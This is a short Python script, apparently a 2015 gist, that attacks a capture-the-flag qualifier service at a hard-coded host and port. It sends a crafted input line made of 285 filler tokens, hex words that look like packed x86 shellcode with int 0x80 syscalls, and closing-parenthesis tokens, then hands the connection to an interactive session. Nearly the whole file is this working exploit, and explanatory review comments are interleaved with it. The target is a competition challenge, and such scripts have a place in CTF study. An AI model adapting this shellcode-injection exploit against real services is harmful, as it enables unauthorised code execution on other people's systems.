
@peternguyen93 peternguyen93/CGC
Created May 18, 2015

#!/usr/bin/python
from Pwning import *
# custom, for when the binary doesn't have NX enabled or mprotect/mmap is in the GOT table
# from Shellcode import *
# edit the template with your own name
class CGC(Payload):
    """One-shot client for a single remote CTF-style service.

    Construction sets the target fields on top of ``Payload`` and opens the
    connection straight away. ``pwnTarget`` then sends one crafted line of
    input and switches to an interactive session.

    ``Payload`` and ``Telnet`` both arrive through ``from Pwning import *``.
    NOTE(review): ``Telnet`` is presumably ``telnetlib.Telnet`` used under
    Python 2 (plain ``str`` is passed to ``read_until``/``write``) -- confirm
    against the Pwning module.
    """

    def __init__(self):
        # Explicit base-class initialiser call, as in the original template.
        Payload.__init__(self)
        # 0 selects the x86 target platform; the template uses 1 for x86_64.
        self.mode = 0
        # The endpoint is hard-coded. Slot 1 of self.host is the entry read
        # back for the connection below; self.host itself comes from Payload.
        self.host[1] = 'cybergrandsandbox_e722a7ec2ad46b9fb8472db37cb95713.quals.shallweplayaga.me'
        self.port = 4347
        # Connecting here means that merely instantiating the class already
        # opens a network connection.
        self.conn = Telnet(self.host[1], self.port)

    def pwnTarget(self):
        """Send the single crafted input line, then go interactive."""
        # Block until the service prints its prompt.
        self.conn.read_until('> ')

        # The line is a run of space-separated tokens in three parts.
        # Part 1: the token 0x41 repeated 285 times.
        filler = '0x41 ' * 285
        # Part 2: six 32-bit hex words followed by two more 0x41 tokens.
        # NOTE(review): the words look like machine code packed into
        # little-endian integers (0xcd / 0x80 byte pairs straddle word
        # boundaries) -- confirm by disassembling before relying on this.
        words = "0x90909080 0xcd5b016a 0x58026a80 0xcd5a506a 0x5b036a59 0x5358036a 0x41 0x41"
        # Part 3: 25 ") " tokens. There is no separator after part 2, so the
        # last 0x41 runs directly into the first ")".
        closers = ') ' * 25
        # Why 285 and 25 are the needed counts depends on the target binary,
        # which is not part of this file.
        line = ''.join((filler, words, closers))

        self.conn.write(line + '\n')
        # Hand the open connection over to the terminal.
        self.conn.interact()
# Script entry point: instantiating CGC opens the connection (see __init__),
# and pwnTarget() sends the input line and then calls interact().
cgc = CGC()
cgc.pwnTarget()